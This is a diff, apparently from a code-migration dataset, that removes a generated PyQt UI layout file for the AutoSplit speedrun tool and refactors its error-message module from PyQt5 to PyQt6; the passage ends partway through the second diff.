self.pauseLabel.setObjectName(_fromUtf8("pauseLabel")) - self.checkfpsButton = QtWidgets.QPushButton(self.centralwidget) - self.checkfpsButton.setGeometry(QtCore.QRect(5, 225, 51, 21)) - self.checkfpsButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.checkfpsButton.setObjectName(_fromUtf8("checkfpsButton")) - self.fpsLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsLabel.setGeometry(QtCore.QRect(87, 225, 20, 20)) - self.fpsLabel.setObjectName(_fromUtf8("fpsLabel")) - self.showlivesimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showlivesimilarityCheckBox.setEnabled(True) - self.showlivesimilarityCheckBox.setGeometry(QtCore.QRect(10, 330, 111, 17)) - self.showlivesimilarityCheckBox.setChecked(True) - self.showlivesimilarityCheckBox.setTristate(False) - self.showlivesimilarityCheckBox.setObjectName(_fromUtf8("showlivesimilarityCheckBox")) - self.showhighestsimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showhighestsimilarityCheckBox.setEnabled(True) - self.showhighestsimilarityCheckBox.setGeometry(QtCore.QRect(10, 351, 131, 17)) - self.showhighestsimilarityCheckBox.setChecked(True) - self.showhighestsimilarityCheckBox.setTristate(False) - self.showhighestsimilarityCheckBox.setObjectName(_fromUtf8("showhighestsimilarityCheckBox")) - self.livesimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.livesimilarityLabel.setGeometry(QtCore.QRect(160, 332, 46, 13)) - self.livesimilarityLabel.setText(_fromUtf8("")) - self.livesimilarityLabel.setObjectName(_fromUtf8("livesimilarityLabel")) - self.highestsimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.highestsimilarityLabel.setGeometry(QtCore.QRect(160, 353, 46, 13)) - self.highestsimilarityLabel.setText(_fromUtf8("")) - self.highestsimilarityLabel.setObjectName(_fromUtf8("highestsimilarityLabel")) - self.splitLabel = QtWidgets.QLabel(self.centralwidget) - self.splitLabel.setGeometry(QtCore.QRect(249, 317, 61, 16)) - self.splitLabel.setObjectName(_fromUtf8("splitLabel")) - self.resetLabel = QtWidgets.QLabel(self.centralwidget) - self.resetLabel.setGeometry(QtCore.QRect(249, 341, 61, 16)) - self.resetLabel.setObjectName(_fromUtf8("resetLabel")) - self.skiptsplitLabel = QtWidgets.QLabel(self.centralwidget) - self.skiptsplitLabel.setGeometry(QtCore.QRect(249, 367, 50, 16)) - self.skiptsplitLabel.setObjectName(_fromUtf8("skiptsplitLabel")) - self.undosplitLabel = QtWidgets.QLabel(self.centralwidget) - self.undosplitLabel.setGeometry(QtCore.QRect(249, 393, 61, 16)) - self.undosplitLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.pausehotkeyLabel = QtWidgets.QLabel(self.centralwidget) - self.pausehotkeyLabel.setGeometry(QtCore.QRect(249, 418, 61, 16)) - self.pausehotkeyLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.splitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitLineEdit.setGeometry(QtCore.QRect(316, 314, 81, 20)) - self.splitLineEdit.setReadOnly(True) - self.splitLineEdit.setObjectName(_fromUtf8("splitLineEdit")) - self.undosplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.undosplitLineEdit.setGeometry(QtCore.QRect(316, 391, 81, 20)) - self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.FocusPolicy.StrongFocus) - self.undosplitLineEdit.setReadOnly(True) - self.undosplitLineEdit.setObjectName(_fromUtf8("undosplitLineEdit")) - self.skipsplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.skipsplitLineEdit.setGeometry(QtCore.QRect(316, 365, 81, 20)) - self.skipsplitLineEdit.setReadOnly(True) - self.skipsplitLineEdit.setObjectName(_fromUtf8("skipsplitLineEdit")) - self.resetLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.resetLineEdit.setGeometry(QtCore.QRect(316, 339, 81, 20)) - self.resetLineEdit.setReadOnly(True) - self.resetLineEdit.setObjectName(_fromUtf8("resetLineEdit")) - self.pausehotkeyLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.pausehotkeyLineEdit.setGeometry(QtCore.QRect(316, 416, 81, 20)) - self.pausehotkeyLineEdit.setReadOnly(True) - self.pausehotkeyLineEdit.setObjectName(_fromUtf8("pausehotkeyLineEdit")) - self.setsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setsplithotkeyButton.setGeometry(QtCore.QRect(409, 314, 71, 21)) - self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setsplithotkeyButton.setObjectName(_fromUtf8("setsplithotkeyButton")) - self.setresethotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setresethotkeyButton.setGeometry(QtCore.QRect(410, 339, 71, 21)) - self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setresethotkeyButton.setObjectName(_fromUtf8("setresethotkeyButton")) - self.setskipsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setskipsplithotkeyButton.setGeometry(QtCore.QRect(410, 365, 71, 21)) - self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setskipsplithotkeyButton.setObjectName(_fromUtf8("setskipsplithotkeyButton")) - self.setundosplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setundosplithotkeyButton.setGeometry(QtCore.QRect(410, 391, 71, 21)) - self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setundosplithotkeyButton.setObjectName(_fromUtf8("setundosplithotkeyButton")) - self.setpausehotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setpausehotkeyButton.setGeometry(QtCore.QRect(410, 416, 71, 21)) - self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setpausehotkeyButton.setObjectName(_fromUtf8("setpausehotkeyButton")) - self.line_live_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_live_bottom.setGeometry(QtCore.QRect(111, 247, 240, 2)) - self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_bottom.setLineWidth(1) - self.line_live_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_bottom.setObjectName(_fromUtf8("line_live_bottom")) - self.line_live_top = QtWidgets.QFrame(self.centralwidget) - self.line_live_top.setGeometry(QtCore.QRect(111, 68, 240, 2)) - self.line_live_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_top.setLineWidth(1) - self.line_live_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_top.setObjectName(_fromUtf8("line_live_top")) - self.line_live_right = QtWidgets.QFrame(self.centralwidget) - self.line_live_right.setGeometry(QtCore.QRect(349, 69, 2, 180)) - self.line_live_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_right.setLineWidth(1) - self.line_live_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_right.setObjectName(_fromUtf8("line_live_right")) - self.line_left = QtWidgets.QFrame(self.centralwidget) - self.line_left.setGeometry(QtCore.QRect(234, 296, 2, 163)) - self.line_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_left.setLineWidth(1) - self.line_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_left.setObjectName(_fromUtf8("line_left")) - self.line_live_left = QtWidgets.QFrame(self.centralwidget) - self.line_live_left.setGeometry(QtCore.QRect(110, 69, 2, 180)) - self.line_live_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_left.setLineWidth(1) - self.line_live_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_left.setObjectName(_fromUtf8("line_live_left")) - self.line_split_left = QtWidgets.QFrame(self.centralwidget) - self.line_split_left.setGeometry(QtCore.QRect(360, 69, 2, 180)) - self.line_split_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_left.setLineWidth(1) - self.line_split_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_left.setObjectName(_fromUtf8("line_split_left")) - self.line_split_right = QtWidgets.QFrame(self.centralwidget) - self.line_split_right.setGeometry(QtCore.QRect(599, 69, 2, 180)) - self.line_split_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_right.setLineWidth(1) - self.line_split_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_right.setObjectName(_fromUtf8("line_split_right")) - self.line_split_top = QtWidgets.QFrame(self.centralwidget) - self.line_split_top.setGeometry(QtCore.QRect(361, 68, 240, 2)) - self.line_split_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_top.setLineWidth(1) - self.line_split_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_top.setObjectName(_fromUtf8("line_split_top")) - self.line_split_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_split_bottom.setGeometry(QtCore.QRect(361, 247, 240, 2)) - self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_bottom.setLineWidth(1) - self.line_split_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_bottom.setObjectName(_fromUtf8("line_split_bottom")) - self.timerglobalhotkeysLabel = QtWidgets.QLabel(self.centralwidget) - self.timerglobalhotkeysLabel.setGeometry(QtCore.QRect(313, 293, 101, 20)) - self.timerglobalhotkeysLabel.setObjectName(_fromUtf8("timerglobalhotkeysLabel")) - self.line_right = QtWidgets.QFrame(self.centralwidget) - self.line_right.setGeometry(QtCore.QRect(489, 296, 2, 163)) - self.line_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_right.setLineWidth(1) - self.line_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_right.setObjectName(_fromUtf8("line_right")) - self.liveImage = QtWidgets.QLabel(self.centralwidget) - self.liveImage.setGeometry(QtCore.QRect(111, 69, 240, 180)) - self.liveImage.setText(_fromUtf8("")) - self.liveImage.setObjectName(_fromUtf8("liveImage")) - self.currentSplitImage = QtWidgets.QLabel(self.centralwidget) - self.currentSplitImage.setGeometry(QtCore.QRect(361, 69, 240, 180)) - self.currentSplitImage.setText(_fromUtf8("")) - self.currentSplitImage.setObjectName(_fromUtf8("currentSplitImage")) - self.currentsplitimageLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimageLabel.setGeometry(QtCore.QRect(370, 50, 221, 20)) - self.currentsplitimageLabel.setObjectName(_fromUtf8("currentsplitimageLabel")) - self.imageloopLabel = QtWidgets.QLabel(self.centralwidget) - self.imageloopLabel.setGeometry(QtCore.QRect(362, 251, 108, 20)) - self.imageloopLabel.setObjectName(_fromUtf8("Image Loop #:")) - self.widthLabel = QtWidgets.QLabel(self.centralwidget) - self.widthLabel.setGeometry(QtCore.QRect(14, 177, 31, 16)) - self.widthLabel.setObjectName(_fromUtf8("widthLabel")) - self.heightLabel = QtWidgets.QLabel(self.centralwidget) - self.heightLabel.setGeometry(QtCore.QRect(68, 177, 31, 16)) - self.heightLabel.setObjectName(_fromUtf8("heightLabel")) - self.fpsvalueLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsvalueLabel.setGeometry(QtCore.QRect(58, 225, 26, 20)) - self.fpsvalueLabel.setText(_fromUtf8("")) - self.fpsvalueLabel.setObjectName(_fromUtf8("fpsvalueLabel")) - self.widthSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.widthSpinBox.setGeometry(QtCore.QRect(6, 193, 44, 22)) - self.widthSpinBox.setMinimum(1) - self.widthSpinBox.setMaximum(10000) - self.widthSpinBox.setProperty("value", 640) - self.widthSpinBox.setObjectName(_fromUtf8("widthSpinBox")) - self.heightSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.heightSpinBox.setGeometry(QtCore.QRect(62, 193, 44, 22)) - self.heightSpinBox.setMinimum(1) - self.heightSpinBox.setMaximum(10000) - self.heightSpinBox.setProperty("value", 480) - self.heightSpinBox.setObjectName(_fromUtf8("heightSpinBox")) - self.captureregionLabel = QtWidgets.QLabel(self.centralwidget) - self.captureregionLabel.setGeometry(QtCore.QRect(192, 50, 81, 16)) - self.captureregionLabel.setObjectName(_fromUtf8("captureregionLabel")) - self.fpslimitLabel = QtWidgets.QLabel(self.centralwidget) - self.fpslimitLabel.setGeometry(QtCore.QRect(8, 251, 51, 16)) - self.fpslimitLabel.setObjectName(_fromUtf8("fpslimitLabel")) - self.fpslimitSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.fpslimitSpinBox.setGeometry(QtCore.QRect(62, 248, 44, 22)) - self.fpslimitSpinBox.setPrefix(_fromUtf8("")) - self.fpslimitSpinBox.setDecimals(0) - self.fpslimitSpinBox.setMinimum(30.0) - self.fpslimitSpinBox.setMaximum(5000.0) - self.fpslimitSpinBox.setSingleStep(1.0) - self.fpslimitSpinBox.setProperty("value", 60.0) - self.fpslimitSpinBox.setObjectName(_fromUtf8("fpslimitSpinBox")) - self.currentsplitimagefileLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimagefileLabel.setGeometry(QtCore.QRect(362, 271, 237, 20)) - self.currentsplitimagefileLabel.setText(_fromUtf8("")) - self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimagefileLabel.setObjectName(_fromUtf8("currentsplitimagefileLabel")) - self.takescreenshotButton = QtWidgets.QPushButton(self.centralwidget) - self.takescreenshotButton.setGeometry(QtCore.QRect(250, 251, 91, 21)) - self.takescreenshotButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.takescreenshotButton.setObjectName(_fromUtf8("takescreenshotButton")) - self.xSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.xSpinBox.setGeometry(QtCore.QRect(6, 154, 44, 22)) - self.xSpinBox.setReadOnly(False) - self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.xSpinBox.setMinimum(0) - self.xSpinBox.setMaximum(999999999) - self.xSpinBox.setSingleStep(1) - self.xSpinBox.setProperty("value", 0) - self.xSpinBox.setObjectName(_fromUtf8("xSpinBox")) - self.ySpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.ySpinBox.setGeometry(QtCore.QRect(62, 154, 44, 22)) - self.ySpinBox.setReadOnly(False) - self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.ySpinBox.setMinimum(0) - self.ySpinBox.setMaximum(999999999) - self.ySpinBox.setProperty("value", 0) - self.ySpinBox.setObjectName(_fromUtf8("ySpinBox")) - self.yLabel = QtWidgets.QLabel(self.centralwidget) - self.yLabel.setGeometry(QtCore.QRect(81, 139, 7, 16)) - self.yLabel.setObjectName(_fromUtf8("yLabel")) - self.comparisonmethodComboBox = QtWidgets.QComboBox(self.centralwidget) - self.comparisonmethodComboBox.setGeometry(QtCore.QRect(143, 299, 81, 22)) - self.comparisonmethodComboBox.setObjectName(_fromUtf8("comparisonmethodComboBox")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.pauseDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.pauseDoubleSpinBox.setGeometry(QtCore.QRect(160, 425, 64, 22)) - self.pauseDoubleSpinBox.setMaximum(999999999.0) - self.pauseDoubleSpinBox.setSingleStep(1.0) - self.pauseDoubleSpinBox.setProperty("value", 10.0) - self.pauseDoubleSpinBox.setObjectName(_fromUtf8("pauseDoubleSpinBox")) - self.custompausetimesCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.custompausetimesCheckBox.setEnabled(True) - self.custompausetimesCheckBox.setGeometry(QtCore.QRect(10, 435, 121, 17)) - self.custompausetimesCheckBox.setWhatsThis(_fromUtf8("")) - self.custompausetimesCheckBox.setChecked(False) - self.custompausetimesCheckBox.setTristate(False) - self.custompausetimesCheckBox.setObjectName(_fromUtf8("custompausetimesCheckBox")) - self.customthresholdsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.customthresholdsCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setGeometry(QtCore.QRect(10, 394, 111, 17)) - self.customthresholdsCheckBox.setWhatsThis(_fromUtf8("")) - self.customthresholdsCheckBox.setChecked(False) - self.customthresholdsCheckBox.setTristate(False) - self.customthresholdsCheckBox.setObjectName(_fromUtf8("customthresholdsCheckBox")) - self.comparisonmethodLabel = QtWidgets.QLabel(self.centralwidget) - self.comparisonmethodLabel.setGeometry(QtCore.QRect(10, 300, 101, 16)) - self.comparisonmethodLabel.setObjectName(_fromUtf8("comparisonmethodLabel")) - self.alignregionButton = QtWidgets.QPushButton(self.centralwidget) - self.alignregionButton.setGeometry(QtCore.QRect(5, 92, 101, 23)) - self.alignregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.alignregionButton.setObjectName(_fromUtf8("alignregionButton")) - self.groupDummySplitsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.groupDummySplitsCheckBox.setGeometry(QtCore.QRect(252, 440, 230, 17)) - self.groupDummySplitsCheckBox.setChecked(False) - self.groupDummySplitsCheckBox.setObjectName(_fromUtf8("groupDummySplitsCheckBox")) - self.selectwindowButton = QtWidgets.QPushButton(self.centralwidget) - self.selectwindowButton.setGeometry(QtCore.QRect(5, 117, 101, 23)) - self.selectwindowButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectwindowButton.setObjectName(_fromUtf8("selectwindowButton")) - self.splitimagefolderLabel.raise_() - self.splitimagefolderLineEdit.raise_() - self.browseButton.raise_() - self.xLabel.raise_() - self.liveimageCheckBox.raise_() - self.loopCheckBox.raise_() - self.autostartonresetCheckBox.raise_() - self.selectregionButton.raise_() - self.similaritythresholdLabel.raise_() - self.similaritythresholdDoubleSpinBox.raise_() - self.startautosplitterButton.raise_() - self.resetButton.raise_() - self.undosplitButton.raise_() - self.skipsplitButton.raise_() - self.pauseLabel.raise_() - self.checkfpsButton.raise_() - self.fpsLabel.raise_() - self.showlivesimilarityCheckBox.raise_() - self.showhighestsimilarityCheckBox.raise_() - self.livesimilarityLabel.raise_() - self.highestsimilarityLabel.raise_() - self.splitLabel.raise_() - self.resetLabel.raise_() - self.skiptsplitLabel.raise_() - self.undosplitLabel.raise_() - self.pausehotkeyLabel.raise_() - self.splitLineEdit.raise_() - self.undosplitLineEdit.raise_() - self.skipsplitLineEdit.raise_() - self.resetLineEdit.raise_() - self.pausehotkeyLineEdit.raise_() - self.setsplithotkeyButton.raise_() - self.setresethotkeyButton.raise_() - self.setskipsplithotkeyButton.raise_() - self.setundosplithotkeyButton.raise_() - self.setpausehotkeyButton.raise_() - self.line_live_bottom.raise_() - self.line_live_top.raise_() - self.line_live_right.raise_() - self.line_left.raise_() - self.line_live_left.raise_() - self.line_split_left.raise_() - self.line_split_right.raise_() - self.line_split_top.raise_() - self.line_split_bottom.raise_() - self.timerglobalhotkeysLabel.raise_() - self.line_right.raise_() - self.currentsplitimageLabel.raise_() - self.imageloopLabel.raise_() - self.liveImage.raise_() - self.currentSplitImage.raise_() - self.widthLabel.raise_() - self.heightLabel.raise_() - self.fpsvalueLabel.raise_() - self.widthSpinBox.raise_() - self.heightSpinBox.raise_() - self.captureregionLabel.raise_() - self.fpslimitLabel.raise_() - self.fpslimitSpinBox.raise_() - self.currentsplitimagefileLabel.raise_() - self.takescreenshotButton.raise_() - self.xSpinBox.raise_() - self.ySpinBox.raise_() - self.yLabel.raise_() - self.comparisonmethodComboBox.raise_() - self.pauseDoubleSpinBox.raise_() - self.custompausetimesCheckBox.raise_() - self.customthresholdsCheckBox.raise_() - self.comparisonmethodLabel.raise_() - self.alignregionButton.raise_() - self.groupDummySplitsCheckBox.raise_() - self.selectwindowButton.raise_() - MainWindow.setCentralWidget(self.centralwidget) - self.menuBar = QtWidgets.QMenuBar(MainWindow) - self.menuBar.setGeometry(QtCore.QRect(0, 0, 612, 21)) - self.menuBar.setObjectName(_fromUtf8("menuBar")) - self.menuFile = QtWidgets.QMenu(self.menuBar) - self.menuFile.setObjectName(_fromUtf8("menuFile")) - self.menuHelp = QtWidgets.QMenu(self.menuBar) - self.menuHelp.setObjectName(_fromUtf8("menuHelp")) - MainWindow.setMenuBar(self.menuBar) - self.actionView_Help = QtWidgets.QWidgetAction(MainWindow) - self.actionView_Help.setObjectName(_fromUtf8("actionView_Help")) - self.actionAbout = QtWidgets.QWidgetAction(MainWindow) - self.actionAbout.setObjectName(_fromUtf8("actionAbout")) - self.actionSave_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings.setObjectName(_fromUtf8("actionSave_Settings")) - self.actionSave_Settings_As = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings_As.setObjectName(_fromUtf8("actionSave_Settings_As")) - self.actionLoad_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionLoad_Settings.setObjectName(_fromUtf8("actionLoad_Settings")) - self.menuHelp.addAction(self.actionView_Help) - self.menuHelp.addAction(self.actionAbout) - self.menuFile.addAction(self.actionSave_Settings) - self.menuFile.addAction(self.actionSave_Settings_As) - self.menuFile.addAction(self.actionLoad_Settings) - self.menuBar.addAction(self.menuFile.menuAction()) - self.menuBar.addAction(self.menuHelp.menuAction()) - - self.retranslateUi(MainWindow) - QtCore.QMetaObject.connectSlotsByName(MainWindow) - MainWindow.setTabOrder(self.splitimagefolderLineEdit, self.xSpinBox) - MainWindow.setTabOrder(self.xSpinBox, self.ySpinBox) - MainWindow.setTabOrder(self.ySpinBox, self.widthSpinBox) - MainWindow.setTabOrder(self.widthSpinBox, self.heightSpinBox) - MainWindow.setTabOrder(self.heightSpinBox, self.fpslimitSpinBox) - MainWindow.setTabOrder(self.fpslimitSpinBox, self.liveimageCheckBox) - MainWindow.setTabOrder(self.liveimageCheckBox, self.comparisonmethodComboBox) - MainWindow.setTabOrder(self.comparisonmethodComboBox, self.showlivesimilarityCheckBox) - MainWindow.setTabOrder(self.showlivesimilarityCheckBox, self.showhighestsimilarityCheckBox) - MainWindow.setTabOrder(self.showhighestsimilarityCheckBox, self.customthresholdsCheckBox) - MainWindow.setTabOrder(self.customthresholdsCheckBox, self.similaritythresholdDoubleSpinBox) - MainWindow.setTabOrder(self.similaritythresholdDoubleSpinBox, self.custompausetimesCheckBox) - MainWindow.setTabOrder(self.custompausetimesCheckBox, self.pauseDoubleSpinBox) - MainWindow.setTabOrder(self.pauseDoubleSpinBox, self.splitLineEdit) - MainWindow.setTabOrder(self.splitLineEdit, self.resetLineEdit) - MainWindow.setTabOrder(self.resetLineEdit, self.skipsplitLineEdit) - MainWindow.setTabOrder(self.skipsplitLineEdit, self.undosplitLineEdit) - MainWindow.setTabOrder(self.undosplitLineEdit, self.pausehotkeyLineEdit) - MainWindow.setTabOrder(self.pausehotkeyLineEdit, self.groupDummySplitsCheckBox) - MainWindow.setTabOrder(self.groupDummySplitsCheckBox, self.loopCheckBox) - MainWindow.setTabOrder(self.loopCheckBox, self.autostartonresetCheckBox) - - def retranslateUi(self, MainWindow): - MainWindow.setWindowTitle(_translate("MainWindow", "AutoSplit", None)) - self.splitimagefolderLabel.setText(_translate("MainWindow", "Split Image Folder:", None)) - self.browseButton.setText(_translate("MainWindow", "Browse..", None)) - self.xLabel.setText(_translate("MainWindow", "X", None)) - self.liveimageCheckBox.setText(_translate("MainWindow", "Live Capture Region", None)) - self.loopCheckBox.setText(_translate("MainWindow", "Loop Split Images", None)) - self.autostartonresetCheckBox.setText(_translate("MainWindow", "Auto Start On Reset", None)) - self.selectregionButton.setText(_translate("MainWindow", "Select Region", None)) - self.similaritythresholdLabel.setText(_translate("MainWindow", "Similarity threshold", None)) - self.startautosplitterButton.setText(_translate("MainWindow", "Start Auto Splitter", None)) - self.resetButton.setText(_translate("MainWindow", "Reset", None)) - self.undosplitButton.setText(_translate("MainWindow", "Undo Split", None)) - self.skipsplitButton.setText(_translate("MainWindow", "Skip Split", None)) - self.pauseLabel.setText(_translate("MainWindow", "Pause time after split (sec)", None)) - self.checkfpsButton.setText(_translate("MainWindow", "Max FPS", None)) - self.fpsLabel.setText(_translate("MainWindow", "FPS", None)) - self.showlivesimilarityCheckBox.setText(_translate("MainWindow", "Show live similarity", None)) - self.showhighestsimilarityCheckBox.setText(_translate("MainWindow", "Show highest similarity", None)) - self.splitLabel.setText(_translate("MainWindow", "Start / Split", None)) - self.resetLabel.setText(_translate("MainWindow", "Reset", None)) - self.skiptsplitLabel.setText(_translate("MainWindow", "Skip Split", None)) - self.undosplitLabel.setText(_translate("MainWindow", "Undo Split", None)) - self.pausehotkeyLabel.setText(_translate("MainWindow", "Pause", None)) - self.setsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setresethotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setskipsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setundosplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setpausehotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.timerglobalhotkeysLabel.setText(_translate("MainWindow", "Timer Global Hotkeys", None)) - self.currentsplitimageLabel.setText(_translate("MainWindow", "Current Split Image", None)) - self.imageloopLabel.setText(_translate("MainWindow", "Image Loop #:", None)) - self.widthLabel.setText(_translate("MainWindow", "Width", None)) - self.heightLabel.setText(_translate("MainWindow", "Height", None)) - self.captureregionLabel.setText(_translate("MainWindow", "Capture Region", None)) - self.fpslimitLabel.setText(_translate("MainWindow", "FPS Limit:", None)) - self.takescreenshotButton.setText(_translate("MainWindow", "Take Screenshot", None)) - self.yLabel.setText(_translate("MainWindow", "Y", None)) - self.comparisonmethodComboBox.setItemText(0, _translate("MainWindow", "L2 Norm", None)) - self.comparisonmethodComboBox.setItemText(1, _translate("MainWindow", "Histograms", None)) - self.comparisonmethodComboBox.setItemText(2, _translate("MainWindow", "pHash", None)) - self.custompausetimesCheckBox.setText(_translate("MainWindow", "Custom pause times", None)) - self.customthresholdsCheckBox.setText(_translate("MainWindow", "Custom thresholds", None)) - self.comparisonmethodLabel.setText(_translate("MainWindow", "Comparison Method", None)) - self.alignregionButton.setText(_translate("MainWindow", "Align Region", None)) - self.groupDummySplitsCheckBox.setText(_translate("MainWindow", "Group dummy splits when undoing/skipping", None)) - self.selectwindowButton.setText(_translate("MainWindow", "Select Window", None)) - self.menuHelp.setTitle(_translate("MainWindow", "Help", None)) - self.menuFile.setTitle(_translate("MainWindow", "File", None)) - self.actionView_Help.setText(_translate("MainWindow", "View Help", None)) - self.actionAbout.setText(_translate("MainWindow", "About", None)) - self.actionSave_Settings.setText(_translate("MainWindow", "Save Settings", None)) - self.actionSave_Settings_As.setText(_translate("MainWindow", "Save Settings As...", None)) - self.actionLoad_Settings.setText(_translate("MainWindow", "Load Settings", None)) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff deleted file mode 100644 index 7b6c743..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff +++ /dev/null @@ -1,184 +0,0 @@ -diff --git a/src/error_messages.py b/src/error_messages.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/error_messages.py - +++ b/src/error_messages.py -@@ -1,142 +1,93 @@ - # Error messages --from PyQt5 import QtWidgets -+from PyQt6 import QtWidgets - --def splitImageDirectoryError(self): -+ -+def setTextMessage(message: str): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') -- msgBox.setText("No split image folder is selected.") -- msgBox.exec_() -+ msgBox.setText(message) -+ msgBox.exec() -+ -+ -+def splitImageDirectoryError(self): -+ setTextMessage("No split image folder is selected.") -+ - - def splitImageDirectoryNotFoundError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("The Split Image Folder does not exist.") -- msgBox.exec_() -+ setTextMessage("The Split Image Folder does not exist.") - - - def imageTypeError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText( -- '"' + image + '" is not a valid image file or the full image file path contains a special character.') -- msgBox.exec_() -+ setTextMessage('"' + image + '" is not a valid image file or the full image file path contains a special character.') - - - def regionError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") -- msgBox.exec_() -+ setTextMessage("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") - - - def regionSizeError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Width and height cannot be 0. Please select a larger region.") -- msgBox.exec_() -+ setTextMessage("Width and height cannot be 0. Please select a larger region.") - - - def splitHotkeyError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No split hotkey has been set.") -- msgBox.exec_() -+ setTextMessage("No split hotkey has been set.") -+ - - def pauseHotkeyError(self): -- msgBox = 